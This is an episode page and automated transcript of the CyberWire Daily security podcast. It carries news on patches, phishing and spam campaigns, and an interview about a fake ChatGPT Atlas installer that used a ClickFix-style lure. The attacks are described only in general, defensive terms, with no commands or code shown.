CyberWire Daily - Stabilized but smaller.
Episode Date: January 22, 2026CISA’s acting director assures Congress the agency has “stabilized”. Google and Cisco patch critical vulnerabilities. Fortinet firewalls are being hit by automated attacks that create rogue acco...unts. A global spam campaign leverages unsecured Zendesk support systems. LastPass warns of attempted account takeovers. Greek authorities make arrests in a sophisticated fake cell tower scam. Executives at Davos express concerns over AI. Pwn2Own Automotive proves profitable. Our guest is Kaushik Devireddy, AI data scientist at Fable Security, with insights on a fake ChatGPT installer. New password, same as the old password. Remember to leave us a 5-star rating and review in your favorite podcast app. Miss an episode? Sign-up for our daily intelligence roundup, Daily Briefing, and you’ll never miss a beat. And be sure to follow CyberWire Daily on LinkedIn. CyberWire Guest Today we are joined by Kaushik Devireddy, AI data scientist at Fable Security, discussing their work on "How a fake ChatGPT installer tried to steal my password". Selected Reading CISA Is 'Trying to Get Back on Its Mission' After Trump Cuts (CISA) Google Patches High-Severity V8 Race Condition in Chrome 144 published: today (Beyond Machines) Cisco Patches Actively Exploited Flaw in Unified Communications Products (Beyond Machines) Hackers breach Fortinet FortiGate devices, steal firewall configs (Bleeping Computer) Zendesk ticket systems hijacked in massive global spam wave (Bleeping Computer) LastPass Warns of Phishing Campaign Attempting to Steal Master Passwords (Infosecurity Magazine) Greek Police Arrest Scammers in Athens Using Fake Cell Tower for SMS Phishing Operation (TechNadu) Execs at Davos say AI's biggest problem isn't hype — it's security (Business Insider) Hackers exploit 29 zero-days on second day of Pwn2Own Automotive (Bleeping Computer) Analysis of 6 Billion Passwords Shows Stagnant User Behavior (SecurityWeek) Share your feedback. What do you think about CyberWire Daily? Please take a few minutes to share your thoughts with us by completing our brief listener survey. Thank you for helping us continue to improve our show. Want to hear your company in the show? N2K CyberWire helps you reach the industry’s most influential leaders and operators, while building visibility, authority, and connectivity across the cybersecurity community. Learn more at sponsor.thecyberwire.com. The CyberWire is a production of N2K Networks, your source for strategic workforce intelligence. © N2K Networks, Inc. Learn more about your ad choices. Visit megaphone.fm/adchoices
Transcript
Discussion (0)
You're listening to the Cyberwire Network, powered by N2K.
Most security conferences talk about Zero Trust.
Zero Trust World puts you inside.
This is a hands-on cybersecurity event designed for practitioners who want real skills, not just theory.
You'll take part in live hacking labs where you'll attack real environments, see how modern threats actually work, and learn how to stop them before they turn into incidents.
But Zero Trust World is more than labs.
You'll also experience expert-led sessions, practical case studies, and technical deep dives focused on real-world implementation.
Whether your blue team, red team, or responsible for securing an entire organization, the content is built to be immediately useful.
You'll earn CPE credits, connect with peers across the industry, and leave with strategies you can put into action right away.
Join us March 4th through the 6th in Orlando, Florida.
Register now at ZTW.com and take your zero-trust strategy from theory to execution.
SISA's acting director assures Congress the agency has stabilized.
Google and Cisco patch critical vulnerabilities.
Fortinette firewalls are being hit by automated attacks.
A global spam campaign leverages unsecured Zendesk support systems.
Last Pass warns of attempted account takeovers.
Greek authorities make arrests in a sophisticated fake cell tower scam.
Executives at Davos express concerns over AI.
Pone to own automotive proves profitable.
Our guest is Kashik Deverelli, AI data scientist at Fable Security,
with insights on a fake chat GPT installer.
And new password, same as the old password.
It's Thursday, January 22nd, 2026.
I'm Dave Bittner, and this is a new password.
your Cyberwire Intel briefing.
Thanks for joining us here today.
It's great to have you with us.
The U.S. Cybersecurity and Infrastructure Security Agency
is working to refocus on its core mission
after a turbulent year marked by staffing losses,
funding disruptions, and internal restructuring.
Acting director Madhu Gadamukala
told the House Homeland Security Committee
that the agency has stabilized
and does not expect further
organizational changes in fiscal year 2026. Sisa now employs more than 2,400 staff,
roughly 1,000 fewer than at the start of the Trump administration.
Gada Mukala said the reductions were part of a broader White House effort to shrink the federal
workforce and right-size the agency. He argued Sisa now has the workforce it needs
and plans targeted initiatives in 2026 to address the most critical cyber risk gaps.
Republicans praised a narrower operational focus,
while Democrats warned proposed budget cuts could weaken civilian cyber defenses
as foreign threats persist.
Funding debates for the Department of Homeland Security, including SISA,
are expected to intensify ahead of a looming shutdown deadline.
Google has released an urgent update,
update for Chrome and other Chromium-based browsers to fix a high-severity flaw in the V8
JavaScript engine. The vulnerability is a race condition that allows memory corruption and could
enable attackers to escape the browser sandbox and run code on a user's system by luring
them to a malicious site. The update, released January 20th, applies to Windows, MacOS,
and Linux. Users should update Chrome and chromium-based browsers.
immediately, according to Google.
Elsewhere, Cisco has issued emergency patches for a critical vulnerability affecting its enterprise
communications platforms, warning of active exploitation attempts.
The flaw is an unauthenticated code injection issue in web-based management interfaces that can
allow attackers to execute commands and potentially gain full system control.
Impacted products include unified communications manager,
Unity Connection, and WebEx calling dedicated instance.
Cisco says there are no workarounds and urges immediate patching.
Researchers warn that Fortinette Fortigate firewalls are being hit by automated
attacks that create rogue accounts and rapidly export firewall configurations.
According to Arctic Wolf, the campaign began January 15th and appears to exploit an unknown
weakness in Fortigate's single sign-on feature, closely resembling attacks seen in December
of last year.
Arctic Wolf says it remains unclear whether current attacks are fully addressed by existing
patches, and customer reports suggest a possible patch bypass.
Fortinette is expected to release additional FortaOS updates to resolve the issue.
Until then, defenders are advised to disable Forta Cloud SSO.
SISA has already flagged the...
earlier vulnerability as actively exploited, while Shadow Server reports nearly 11,000 exposed
devices online.
A global spam campaign has flooded inboxes with hundreds of confusing emails generated through
unsecured Zendesk support systems. The wave began January 18th and abuses Zendesk's default
settings that allows unverified users to submit support tickets, which then trigger automated
confirmation emails to whatever address is entered.
Attackers iterated through large email lists,
effectively turning legitimate customer support platforms into mass spam engines.
The emails feature bizarre or alarming subject lines,
including fake legal notices and promotional offers,
often written with decorative unicode text.
While the messages do not contain malicious links,
they bypass spam filters because they originate,
from trusted companies, making them particularly disruptive.
Effected organizations include Discord, Dropbox, Riot Games, and government agencies.
Zendesk says it's rolled out new safeguards to detect and limit this relay spam
and advises customers to restrict ticket submissions to verified users.
Last Pass is warning users about an active fishing campaign designed to steal master passwords
and take over accounts.
According to the company's threat intelligence, mitigation, and escalation team,
the campaign began January 19th and is circulating widely.
The phishing emails impersonate LastPass and claim users must urgently back up their
password vaults within 24 hours ahead of supposed maintenance.
Links in the messages lead to a fake LastPass login page that captures credentials if entered.
because LastPass stores passwords for other services,
a compromised master password could expose many additional accounts.
LastPass says it will never ask for a master password or demand immediate action
and is working with partners to take down the malicious domains.
The company urges users to remain cautious,
noting that false urgency is a common fishing tactic.
Greek authorities have arrested two foreign national,
National's accused of running a sophisticated fake cell tower scam in the Athens area.
According to Hellenic police, officers discovered a mobile computing system hidden in a car trunk
that acted as a rogue cellular base station, often called an SMS blaster.
The setup linked to a concealed roof antenna, impersonated legitimate telecom infrastructure,
and intercepted nearby mobile connections.
Police say the suspects exploited known weakness.
in mobile network protocols, forcing phones to downgrade from 4G to less secure 2G connections.
This allowed them to collect device identifiers and phone numbers, which were then used in
smishing campaigns posing as banks or courier services. Authorities have tied the operation
to several confirmed fraud cases in and around Athens with investigations ongoing.
Executives from EY and KPMG warned at the World Economic Forum in Davos that AI security is emerging as a major enterprise risk.
EY's Raj Sharma told Business Insider that organizations are not adequately addressing the security and lifecycle management of AI agents,
which can access sensitive data but lack clear identity and controls.
He argued that industrial-grade security frameworks for AI agents are still immature.
KPMG U.S. CEO Tim Walsh echoed those concerns, saying AI-related cyber risk is now a top issue for CEOs
and is slowing some AI deployments as firms reassessed data protection.
Walsh also flagged quantum computing as a future security threat,
warning that it could break current encryption and force widespread re-endend.
engineering of security systems.
Day two of Pone to Own Automotive 2026 proved that hacking cars and chargers can be very
profitable.
Security researchers walked away with over $439,000 in prize money after popping 29 fresh
zero-day bugs at the event in Tokyo held during the Automotive World Show.
After two days, total winnings hit over 955,000.
$2,000 across 66-0 days. Fuzzware I.O. led the pack with $213,000, thanks to successful hacks
against multiple EV chargers. Other teams rooted infotainment systems, car operating systems like
automotive-grade Linux, and more charging hardware. Even Tesla Tech made an appearance earlier in
the contest. The fun continues on day three with more chargers and systems.
lined up for attack. Benders now have 90 days to patch before details go public, so the clock
is ticking. Coming up after the break, my conversation with Koshik Deveready from Fable Security.
We're discussing insights on a fake chat GPT installer. And new password, same as the old password.
Stick around. Ever wished you could rebuild your network from scratch to make it more secure,
scalable, and simple? Meet.
Meter, the company reimagining enterprise networking from the ground up.
Meter builds full-stack zero-trust networks, including hardware, firmware, and software,
all designed to work seamlessly together.
The result?
Fast, reliable, and secure connectivity without the constant patching, vendor-juggling, or hidden costs.
From wired and wireless to routing, switching, firewalls, DNS security, and VPN,
Every layer is integrated and continuously protected in one unified platform.
And since it's delivered as one predictable monthly service,
you skip the heavy capital costs and endless upgrade cycles.
Meter even buys back your old infrastructure to make switching effortless.
Transform complexity into simplicity and give your team time to focus on what really matters,
helping your business and customers thrive.
Learn more and book your demo at meter.com.
slash cyberwire. That's M-E-T-E-R dot com slash cyberwire.
What's your 2 a.m. security worry? Is it, do I have the right controls in place?
Maybe are my vendors secure? Or the one that really keeps you up at night, how do I get out from
under these old tools and manual processes? That's where Vanta comes in. Vanta automates the
manual work, so you can stop sweating over spreadsheets, chasing audit evidence, and filling out
endless questionnaires. Their trust management platform continuously monitors your systems,
centralizes your data, and simplifies your security at scale. And it fits right into your
workflows, using AI to streamline evidence collection, flag risks, and keep your program
audit ready all the time. With Vanta, you get everything you need to move faster, scale
confidently, and finally get back to sleep. Get started at Vanta.com slash cyber.
That's V-A-N-T-A-com slash cyber.
Kaushik Deverelli is AI data scientist at Fable Security.
We recently got together to discuss insights on a fake chat GPT installer.
So it was right before the Thanksgiving holidays.
I think we work at a startup, but even around Thanksgiving,
things are slowing down a little bit.
I found myself with a little bit of free time to kind of do some research,
explore online.
And I was very interested in the concept of the AI browser, which many of you have probably heard of.
And I wanted to try it out, give it a spin, and actually test them on their susceptibility to prompt injection.
So these are browsers like ChatGBT-GBT-Atlas, Poreplexity Comet, Atlassians, Dia.
When I searched for the first one, Chat-GPT Atlas, it had very recently released.
I curiously noticed on Google when you search that term, the first reason,
was actually a sponsored result.
And it looked, you know, the title and description looked identical to the second result,
which was an official Google search result from chat GPT itself.
And so I immediately picked up that it was a fake site given that it was served from a Google site's domain
and decided to go down that rabbit hole instead to see, you know, what kind of attack this would present me with.
When I clicked on that site, it was very interesting.
because the website looked exactly identical to the normal chat GPT Atlas site.
I pulled them both side by side to compare.
And so the malicious group had stealing exactly the HTML, the styling, everything from the links themselves.
And there was really no way to tell that this was a malicious website other than the domain itself, not being chat GPTs.
And so I decided to take it one step further and look through the entire key.
chain. And so when I clicked the download button to get the AI browser downloaded, rather than
it downloading some software to my laptop, I presented me with a new screen. This is where it
differs from the official chat GPT website, asking me to run a command on my laptop. Now, most of the
audience may recognize this is what's commonly known as a click-fix attack. But the really interesting
piece here is typically
Click Fix attacks.
The name, it's called Click Fix
because it's typically
prompting you to fix something on your
computer. It may say, hey, Dave,
your software is out of date.
To continue accessing this website,
please run this command.
Or, hey, please prove to us that you're a human.
We think you're a bot.
Run this command. This was very different
because it was actually telling me,
hey, we're going to give you this AI browser.
You have this intent to download it.
Here's exactly how to download it by running a command
kind of on your computer.
And I thought this was very interesting
because while click-fix attacks are well known,
the deception strategy and the entry point
was very different from a traditional click-fix attack.
Now, are you on a Mac or a PC here?
I'm on a Mac.
Okay.
Yeah.
And the website actually said a download,
it gave me a download for Mac button.
Huh. So what happens next?
Totally. So if you run that command, which, if that website is still live,
please do not run that command on your computer.
But I actually pulled the script into a sandbox environment to see what it would actually do.
And at first glance, the command looks almost benign.
It's running a, it's pulling a script from the internet and executing it.
And it is encoded in base 64.
So there's no way to see what the URL is that it's curling and pulling the script from.
If you decode the base 64, you'll notice it's a very peculiar URL.
It's a free file hosting site.
And this is where the threat actor group was hosting some info stealer malware.
So had you installed this, it would have downloaded the info stealer malware.
Do you happen to know what flavor of info stealer it was trying to put on your system?
Totally. So the curious step before it was it would actually ask you for your system password. So it's clear that the InfoSteeler malware wouldn't be able to execute without pseudo permissions. And so if you didn't type in your password properly, it would keep prompting you over and over saying, hey, we can't install until you type your password. I ended up getting the Info Steeler malware and uploading it to Virus Total to see what matches I could find. At the time, there were
no specific matches that it was able to determine.
But I think the really interesting piece was I have running an EDR on my laptop and are in the
sandbox.
And the EDR did not pick up that it was a malicious file.
As a Mac user, and I'm a Mac user myself, it's fair to say, don't you think that for someone
to ask you to invoke the terminal and enter a command,
that rarely happens.
Correct, correct.
So that was a red flag for you.
Yes, yes.
I think you should never run an arbitrary shell command on your computer,
unless, especially on a corporate device,
which has very sensitive information,
unless you're absolutely sure you know what it's doing.
So there's multiple things at play here.
I mean, what are the take-home lessons for you
in terms of advising,
folks to best protect themselves here.
Totally. I think, like, traditionally when we think about ClickFix attacks and the way these
attacks come in, typically, you know, the attack vector is it lands in your email inbox.
You know, there's a phishing email which will lead you to this URL and the URL, that website,
will try and instruct users, hey, run this command. I think now we're starting to see, hey,
there are other ways that people can land upon this click-fix attack,
and we need to spread awareness that these other attack factors exist.
And I think at a very basic level,
we should be educating people that they should not be running arbitrary commands on their computer.
What if I'm in charge of administrating the computers?
And let's stay on the Mac here for a while.
If I had denied someone access to terminal or the ability to, you know,
the ability to run as root. Would that have helped?
Yeah, I think there's a certain class of users, right,
that you can lock down the device a bit more,
especially if they're not developers.
Removing route access to the terminal is a very positive step.
Now, there's always going to be users who need that type of access,
like software developers who are developing locally.
And for them, a technical control may not be enough,
and that's why we need the awareness piece for.
That's Kaushik Deverelli from Fable Security.
When it comes to mobile application security, good enough is a risk.
A recent survey shows that 72% of organizations reported at least one mobile application security incident last year,
and 92% of responders reported threat levels have increased in the past two years.
Guard Square delivers the highest level of security for your mobile apps without compromising
performance, time to market, or user experience.
Discover how Guard Square provides industry-leading security for your Android and iOS apps at
www.gardsquare.com.
Security works best in layers, and when those layers actually work together, that's when
things get interesting.
NordLayer is a network security platform designed for modern teams.
It secures connections, controls access, and helps stop threats all without
hardware or long deployment cycles. Now, Nordlayer has partnered with CrowdStrike to bring Falcon
endpoint protection into the mix, giving small and mid-sized businesses a multi-layered security approach
that's practical to deploy and easy to manage. NordLayer handles secure access and zero-trust networking.
CrowdStrike Falcon adds endpoint visibility and protection. Together, they cover more ground than
either could alone without requiring a large IT staff.
business leaders, that means clearer control and easier compliance. For IT teams, it means granular
access policies, faster onboarding and protection that scales. If you're looking for enterprise-grade
security without enterprise-grade complexity, take a look at Nordlayer. Get up to 22% off yearly
plans, plus an additional 10% with code Cyberwire-10. There's even a 14-day money-back guarantee.
Check out Nordlayer.com slash Cyberwire Daily to learn more.
And finally, after another year of security training,
stern warnings and posters begging users to think before you type,
passwords have once again refused to evolve.
An analysis of 6 billion leaked credentials by specop software
using data from its parent firm Outpost 24 shows that 2025,
most common passwords were the same familiar classics.
1234-5-6,
password and admin,
apparently still doing brisk business.
The report suggests this is not nostalgia, but habit.
Numeric strings dominate personal accounts,
while admin and password linger on enterprise gear
from networking devices to industrial systems.
That creates a predictable path for attackers
who can reuse stolen,
credentials to access VPN's, active directory, or cloud services. Even more complex passwords often
just decorate old favorites with a few extra characters. The lesson is dry but clear. Attackers innovate,
users reuse, and security teams clean up the mess. And that's the Cyberwire for links to all of
today's stories. Check out our daily briefing at the Cyberwire.com. We'd love to know what you think of
this podcast, your feedback ensures we deliver the insights that keep you a step ahead in the
rapidly changing world of cybersecurity. If you like our show, please share a rating and review
in your favorite podcast app. Please also fill out the survey in the show notes or send an email
to Cyberwire at N2K.com. N2K's senior producer is Alice Carruth. Our Cyberwire producer is Liz
Stokes. We're mixed by Trey Hester with original music by Elliot Heltsman. Our executive producer
Jennifer Iben. Peter Kilby is our publisher, and I'm Dave Bittner. Thanks for listening. We'll see you back here tomorrow.
If you only attend one cybersecurity conference this year, make it RSAC 2026. It's happening March 23rd through the 26th in San Francisco,
bringing together the global security community for four days of expert insights, hands-on learning, and real innovation.
I'll say this plainly, I never miss this conference. The ideas and
conversations stay with me all year. Join thousands of practitioners and leaders tackling today's
toughest challenges and shaping what comes next. Register today at rsacconference.com slash
Cyberwire 26. I'll see you in San Francisco.
Attackers don't go through your tools. They go around them. In our interview with Jared
Atkinson, CTO at SpectorOps, he reveals how attackers look to exploit our identities, steal
tokens and quietly snowball their access across active directory, cloud apps, and GitHub.
We talk through attack paths, why least privilege keeps failing, and how one misconfiguration
can hand over the keys to your organization.
Want to see risk as attackers do?
Then check out the full interview now on thecyberwire.com slash specterops.